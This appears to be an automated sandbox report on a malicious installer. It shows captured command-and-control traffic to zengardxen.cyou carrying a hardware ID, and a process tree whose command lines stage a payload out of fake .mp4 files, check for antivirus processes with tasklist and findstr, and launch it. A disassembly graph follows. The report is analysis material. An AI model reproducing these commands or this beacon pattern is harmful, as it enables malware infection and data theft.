                                    Data Ascii: u^Tw,'@7zA5Gqc3fdwY\xT^nOl 2(tO8ag@kHUb*!NW;47}9<Vq`_cMoHyv);q`Zn3PN;%:qoge6Kv#|3YKw0|9:|TBBd
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 3b ed fd 12 52 96 e5 81 96 34 c3 01 89 3f a5 7f 9f 34 2a 0e 52 56 11 e6 f4 99 88 e8 7f 2d 90 e1 87 29 01 f0 e0 5b 22 c8 b7 91 64 b8 a0 e9 be 32 b7 41 f6 59 ba d4 a2 ab a6 6c be 05 b0 24 4f 7f 43 ad c6 6a 43 4e b0 79 66 b5 04 db 0a 20 dc 59 1c 90 c4 d0 30 df 36 4f 1c 2b 01 b4 37 44 3a 09 d6 60 e0 f7 7d e1 10 24 be 25 08 da a1 ce 3f 34 f2 11 89 88 2b b1 fe f8 7d a7 08 3f 24 be 0e 4d 8a ac be c1 73 3c c6 64 52 69 c1 69 3d b6 85 e6 e6 4a b5 c1 0e 3b 3d cc 10 72 3d 26 e9 c5 75 13 93 82 09 ae 5f d2 62 7f 1f 87 b6 8b 71 a1 09 b7 2f c6 4b 6e 2d 05 98 3b a3 ee ba de 5b f8 5e e5 dc 4f d3 66 25 1c 32 aa 30 71 e6 3e fa c3 26 e4 7d 47 82 9a b0 49 2b ef d8 d3 f9 dd 7a 9d 6b f9 8f 25 23 f7 4d 76 d4 21 e1 ea e3 88 7c f3 c8 5c c3 ba ea c3 1b 13 79 2b fe 6a 99 75 8e 47 33
                                    Data Ascii: ;R4?4*RV-)["d2AYl$OCjCNyf Y06O+7D:`}$%?4+}?$Ms<dRii=J;=r=&u_bq/Kn-;[^Of%20q>&}GI+zk%#Mv!|\y+juG3
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 83 f9 48 85 2f 0b fb b2 ee 55 f7 34 8a d6 7b e1 99 fa 31 56 8e 1c 10 2a 5b 38 da 05 fd 7b a3 e2 d0 92 6b 64 30 08 f0 9d 4f 2f c7 14 0b 9c 38 65 30 29 d7 69 15 11 48 96 68 bb f4 51 5e 31 a5 7c 4b eb 19 92 2d 19 38 65 d2 75 2c d4 2e 4f d7 b2 fc 89 19 3b 6b d3 4a 78 de 69 31 13 d2 db f0 6a 8e b2 a9 41 6e 63 5f 07 fc bd f4 9a 22 f0 28 5e 74 d6 5c a9 1a 20 db 3a 09 c3 a4 13 24 29 57 7c f7 b8 c3 d0 68 0b 45 07 85 c6 b4 28 a6 fb 00 d1 a1 e2 70 9a 32 ef b9 d2 2c ec ce 2d fb a8 60 2d 23 38 9a 56 d4 71 9e 96 ee 1a ac 00 ab fd 98 e5 02 36 40 68 09 2f f0 4c 0d 1e b1 17 de 94 9a ea f2 a5 da 9a f9 6d 07 28 cd 7e d2 ec b6 52 fe 2b 98 8b 18 1e c6 a3 3c 67 02 61 5e 1f 3f 21 96 0b b1 72 4a 93 fe 0d a3 de 19 08 99 ca e9 49 4c 1a 48 6c d5 f1 af 69 91 c7 7b c4 e8 63 fc 01 12
                                    Data Ascii: H/U4{1V*[8{kd0O/8e0)iHhQ^1|K-8eu,.O;kJxi1jAnc_"(^t\ :$)W|hE(p2,-`-#8Vq6@h/Lm(~R+<ga^?!rJILHli{c
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: e3 da 4a e0 86 68 44 86 c2 7d bc fd 21 c4 3b 43 c8 aa 38 70 d9 f6 af 29 57 28 c3 9f c3 0e f4 11 e3 b2 7c 9c c2 f6 03 44 74 c8 52 cc 3c b0 3d 07 0b b0 f0 7f 88 92 42 b7 d6 0b 91 2d 33 33 e6 f7 f0 8e 49 13 3b e6 a8 87 59 62 e9 a7 69 32 20 5d 1b 82 20 fb 9b 34 e1 d5 1f 7d 5e 07 09 b9 f1 b5 de 6b d0 f4 4f 01 a2 70 44 01 bf ed 49 5c 86 3b 9f fa 37 5a 74 28 86 ea c1 5f 82 64 ce 3c a5 04 e3 0b 21 a4 b8 ed fe ff f8 36 7f 86 61 82 bd 57 f9 07 af ff b2 19 8a 20 70 15 1f 4a 2e 48 5c 41 07 1f 39 ee da 91 74 b7 61 57 be a3 56 ad 88 bb 1b ce 11 38 d6 1e 4d 9d 66 bd b2 52 f9 d9 fe f4 76 c7 ee 41 42 f6 d1 c1 0f b7 15 79 3f d2 2d 46 a5 8f 6f bf 2e 36 f7 c0 5d a8 e5 b1 c5 b0 07 35 ac 6c d2 eb b4 53 17 4c b3 9b 9e 85 f7 fc 9c 74 15 7c 7e 8c 18 66 21 05 5f 48 81 b2 bd 13 ce
                                    Data Ascii: JhD}!;C8p)W(|DtR<=B-33I;Ybi2 ] 4}^kOpDI\;7Zt(_d<!6aW pJ.H\A9taWV8MfRvABy?-Fo.6]5lSLt|~f!_H
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 4d 26 68 5d 8d 4a 10 d9 33 7d 48 e5 f5 80 c5 ab 1a 82 00 b4 34 85 7a 8d 67 4c 61 5e 8f f3 f1 1a c6 84 c1 b1 5b ad 1b c7 04 6c 11 f3 ef cd ab ca 12 5c be ee 91 e4 43 d9 ce ab d3 e5 5a f7 9b 20 b9 d4 28 4a 7d cc 28 b8 3e b1 f3 ee 45 02 c8 3f 38 76 4a 23 7d f7 7c d3 25 3d 2e 01 21 cd c3 34 ab a6 74 93 10 4f 05 64 e9 36 46 29 31 5f 2d 5e 8a 3c 89 0d b8 79 73 64 7b fe eb 89 fb 42 e0 d6 1d 4a f3 66 96 81 42 17 6a 96 e5 78 79 0a d7 87 9b 32 ed 4d 7f 0a d3 76 26 ed 61 53 08 d8 e1 e8 ff 4b 3c 94 00 e9 ef 23 5b 67 85 59 77 b7 17 8a 4f 2e a9 55 53 67 92 3a 75 24 f4 d3 cb 80 15 88 bb 08 f3 02 fd 9e e7 68 3c 88 53 a7 1b c7 41 06 54 1f 02 40 16 e0 41 34 ad f1 53 5b b1 f7 68 9d 0a 38 4e 4f f8 38 e2 af 3c 7f af a7 aa 28 47 81 91 84 03 f9 55 ac 2d 15 30 6b a5 2a 04 02 08
                                    Data Ascii: M&h]J3}H4zgLa^[l\CZ (J}(>E?8vJ#}|%=.!4tOd6F)1_-^<ysd{BJfBjxy2Mv&aSK<#[gYwO.USg:u$h<SAT@A4S[h8NO8<(GU-0k*
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: bd de 7c 47 d5 75 75 52 07 b2 16 91 78 69 7f 59 7d 37 42 a9 c5 77 ba 17 0e e2 31 a4 2b 0e 7d a9 22 c9 59 57 a5 4a 7e 96 e6 4e 19 bb 6e f1 33 f9 25 a7 67 0d 24 e4 7b 9e 3a f9 33 af 33 93 5c 8f 13 5a cf 25 a6 5d 03 c3 61 1b 43 bc 80 b5 fe 44 e3 15 db 7b 4b c9 d1 a0 66 9b 5f 64 3b 66 65 c1 b5 e6 a7 e4 5c df c7 7a 88 96 3e b4 f9 23 3b 60 78 2c 33 3b 3c 6f aa 72 df d9 1d e6 9b b3 3b 91 42 67 77 72 6a e2 d8 b8 c1 4b 4b ec e4 91 7f 69 06 27 a8 52 05 03 12 f1 df b9 c9 39 54 46 a1 54 a7 5e 42 de 69 59 ba ff d9 b0 b3 cc d8 dc 7d 4b 0b d5 ba 1c c2 a5 0b 5a ef 21 3a 9f 57 65 67 6d d9 bb 8e c0 ea 8d 9d ff 9b a5 94 e1 cf f0 97 0b 3b 70 fd d8 70 52 9b b0 e0 9b 23 86 42 30 69 8c 06 47 22 f4 af 30 49 e6 ee 35 25 1d c9 33 8a 67 ec 62 96 f4 d8 aa 13 6f ce 3a cb 88 08 1f ad
                                    Data Ascii: |GuuRxiY}7Bw1+}"YWJ~Nn3%g${:33\Z%]aCD{Kf_d;fe\z>#;`x,3;<or;BgwrjKKi'R9TFT^BiY}KZ!:Wegm;ppR#B0iG"0I5%3gbo:
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 27 a4 40 a6 5a e0 8f 1f 86 b3 a9 d7 0f 63 7d 52 6e 10 0e a7 a5 dc c0 9e d5 d4 d7 c4 07 2b f3 65 06 19 c2 8c 56 ca a4 23 93 31 df 55 3d c9 90 4c 0c be a7 bd 3f 94 92 fd 9e 40 d1 2c e0 d1 f0 95 37 a1 54 57 06 63 9f 87 8c f3 68 8b f6 d2 ff 5b 73 8b bc c8 82 27 c5 c0 e7 2a b0 39 80 a6 15 40 0c 91 21 97 1d 6a a8 31 0c e8 59 cd 46 51 d4 b8 95 ad b8 31 a8 45 e3 30 3f c1 de a7 0b f6 80 54 25 d7 ac 46 ec 58 a3 2b bf 61 a4 b8 81 02 35 c6 7b e3 12 b4 67 bc 5c 22 0c 60 c1 d5 bf cd 55 6f 7f c2 ae e8 ab 50 14 a3 92 b8 99 54 28 4f a1 60 61 08 35 3c 4d 0e 0f 4a 44 4b 20 05 fe 95 0e db 55 f0 88 2b b6 59 26 30 7a f3 23 33 94 9f cc a8 6c 1b 9c 89 86 5b 0b b0 66 2b 54 d4 f2 e3 26 f4 e9 c8 94 27 11 e9 aa fb 30 4c 45 4c 47 88 00 61 4f ff b7 7a 0f 6e 97 28 74 8b ee 2d 53 38 0c
                                    Data Ascii: '@Zc}Rn+eV#1U=L?@,7TWch[s'*9@!j1YFQ1E0?T%FX+a5{g\"`UoPT(O`a5<MJDK U+Y&0z#3l[f+T&'0LELGaOzn(t-S8
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 7c c9 a3 2f 07 b8 7c cc ba e4 9a fd f8 be e0 95 09 af 07 3d 86 56 4b 79 a6 91 90 d2 06 0f 0e 4a 4b 30 3d 3a e8 6f 4d 28 99 8a 0a d1 97 94 44 bf 8e b0 df e5 1c 8e 73 ba 54 89 f1 3e 8f 80 80 60 3d 15 a2 59 66 93 ee 72 d6 4e 9b f4 2e 6e bc 1f 39 20 a2 68 a5 63 29 72 7f d1 26 00 5c ac cc 5f 02 2b c5 cd 23 04 c0 25 a2 8b 27 e6 c4 1c 22 61 7c bd 70 42 e3 ef 1a 62 f9 c9 21 26 46 2e 55 29 25 1b 5e 57 53 9e dc 53 62 b5 2b d1 e0 30 bf 5a 71 e6 89 5f 41 a2 e3 63 2c 32 36 d8 ae c6 93 86 8a 21 09 dd 1f 9d 0d aa bc bb 80 56 d9 b0 4f ce e7 42 73 0f 7f b4 8c 1d e1 06 7e b1 27 c8 7a 84 31 05 de 69 32 3d f9 a4 a3 be 4a 9c 3b 59 4d a0 ed 67 c8 07 40 3a 64 46 72 e2 d9 7b f1 d8 8a 83 ef ce c8 db 18 d8 6b 39 77 33 9e 64 89 70 61 3a ff 9f 26 a1 6d 57 6f 10 9c 30 d5 ba 12 cd 9f
                                    Data Ascii: |/|=VKyJK0=:oM(DsT>`=YfrN.n9 hc)r&\_+#%'"a|pBb!&F.U)%^WSSb+0Zq_Ac,26!VOBs~'z1i2=J;YMg@:dFr{k9w3dpa:&mWo0
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 5e 3d b9 a2 4d 5f 84 37 7e 73 bc 63 37 7e 7c bd 97 54 ba c9 b9 e1 1e 1a 09 fb 94 ff aa a1 08 80 99 c0 e4 c8 e0 99 15 a6 86 27 a7 78 c3 68 a8 6b d9 cb c3 70 55 5e 00 22 8f ca 56 70 66 b7 f1 00 eb 6c fb a9 df b3 96 e6 f2 62 8c d3 a5 3a 2e 85 d3 95 00 78 22 7a b7 f3 90 78 d3 6e 90 b0 fe e1 74 1a bb cf 0a 5b b4 b2 71 49 a0 24 2f eb 76 dd e6 64 97 06 fe 8b 78 8c bd d3 e6 e2 18 2d 76 e3 77 e9 d0 83 53 2b c9 ec b3 fa 97 30 45 5b bb 86 7a a0 5a fb fd ed bf 42 5c 32 24 df 67 f5 26 b6 36 9f 41 7d 77 53 3e 92 0d 68 7f cc 8d f5 da 8f 41 f0 8f f0 2b b7 f3 ff 91 69 e1 99 34 f9 b1 96 2d 76 1a 2d 72 9a 8b 74 0c 32 2a 4f 3e c5 bd fb 70 d1 68 15 55 49 b8 aa 97 f1 c6 63 78 cf 80 ab 3b f3 cb de f8 aa aa 37 1e e1 e9 9a b0 7c 85 c3 5f 93 6c 1e 03 5e d6 93 2e 6d 43 5e 03 6d 95
                                    Data Ascii: ^=M_7~sc7~|T'xhkpU^"Vpflb:.x"zxnt[qI$/vdx-vwS+0E[zZB\2$g&6A}wS>hA+i4-v-rt2*O>phUIcx;7|_l^.mC^m
                                    2025-02-14 15:56:04 UTC | 1128 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:56:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=n47mm8savm8m2vvgi8vjnpp6u9; expires=Sat, 15 Feb 2025 15:56:04 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVs3w1lEawtvyf2FD0gV6h9fogNNbThpKbCfs8ekTqu8xDqGIvWdQBf9pIffa0%2BzsM34qT3mSFDqU%2BO2wwr9efmNijL%2BNYwhiMOSbIQljCJse3mpstUQslEiK4U3tkVd2t0%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ef7dcebc5af-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7200&min_rtt=7123&rtt_var=2726&sent=196&recv=577&lost=0&retrans=0&sent_bytes=2837&recv_bytes=561433&delivery_rate=409939&cwnd=32&unsent_bytes=0&cid=733821f5dc3d0d64&ts=1811&x=0"


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    7 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | 7884 | C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-02-14 15:56:05 UTC | 263 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 80
                                    Host: zengardxen.cyou
                                    2025-02-14 15:56:05 UTC | 80 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 6d 6d 6d 26 6a 3d 26 68 77 69 64 3d 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45
                                    Data Ascii: act=get_message&ver=4.0&lid=WG6I6S--mmm&j=&hwid=00C86C1DFDB86EAC2BAC4A2D01E9EDDE
                                    2025-02-14 15:56:05 UTC | 1122 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:56:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=pssm86hrnu49riojm36ff079l7; expires=Sat, 15 Feb 2025 15:56:05 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zm5nsd9dUhSb2wBCvGYIVVHW6KeudG4zjuVXS9d5OKjKP1pm%2FQ%2BlpJXmmj2lreLbCeHtveyYVeUHG%2BDPXhjiNwAo3yL1SuNEpc7AgAuFn0Cd6up%2BuNmfIuDlYbO5hwDxKDk%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3f067d720829-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=8797&min_rtt=8790&rtt_var=3312&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=979&delivery_rate=329831&cwnd=32&unsent_bytes=0&cid=c8c15c19e973f65c&ts=556&x=0"
                                    2025-02-14 15:56:05 UTC | 54 | IN | Data Raw: 33 30 0d 0a 36 46 2f 61 68 32 55 77 7a 72 72 47 47 31 6f 58 6c 51 4a 62 58 2b 6c 4d 4e 71 48 35 30 38 2f 73 67 61 6c 54 6a 59 49 79 78 32 65 7a 41 67 3d 3d 0d 0a
                                    Data Ascii: 306F/ah2UwzrrGG1oXlQJbX+lMNqH508/sgalTjYIyx2ezAg==
                                    2025-02-14 15:56:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Target ID:0
                                    Start time:10:55:16
                                    Start date:14/02/2025
                                    Path:C:\Users\user\Desktop\Setup-Latest.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Setup-Latest.exe"
                                    Imagebase:0x400000
                                    File size:1'444'885 bytes
                                    MD5 hash:D905D14928E2766285ED7CA83EAAF4B3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:10:55:16
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:10:55:16
                                    Start date:14/02/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:10:55:16
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\expand.exe
                                    Wow64 process (32bit):true
                                    Commandline:expand Wide.mp4 Wide.mp4.bat
                                    Imagebase:0x430000
                                    File size:53'248 bytes
                                    MD5 hash:544B0DBFF3F393BCE8BB9D815F532D51
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:4
                                    Start time:10:55:18
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x50000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:10:55:18
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /I "opssvc wrsa"
                                    Imagebase:0x300000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:10:55:18
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x50000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:10:55:18
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                    Imagebase:0x300000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:10:55:19
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c md 562639
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:10:55:19
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                    Wow64 process (32bit):true
                                    Commandline:extrac32 /Y /E Always.mp4
                                    Imagebase:0x9c0000
                                    File size:29'184 bytes
                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:10
                                    Start time:10:55:20
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /V "Yang" Labor
                                    Imagebase:0x300000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:10:55:20
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.com
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:10:55:20
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 G
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:13
                                    Start time:10:55:20
                                    Start date:14/02/2025
                                    Path:C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    Wow64 process (32bit):true
                                    Commandline:Wages.com G
                                    Imagebase:0x8b0000
                                    File size:947'288 bytes
                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Has exited:true

                                    Target ID:14
                                    Start time:10:55:21
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\choice.exe
                                    Wow64 process (32bit):true
                                    Commandline:choice /d y /t 5
                                    Imagebase:0x3c0000
                                    File size:28'160 bytes
                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                      Execution Graph

                                      Execution Coverage:17.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:21%
                                      Total number of Nodes:1482
                                      Total number of Limit Nodes:28
                                      execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 
4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 
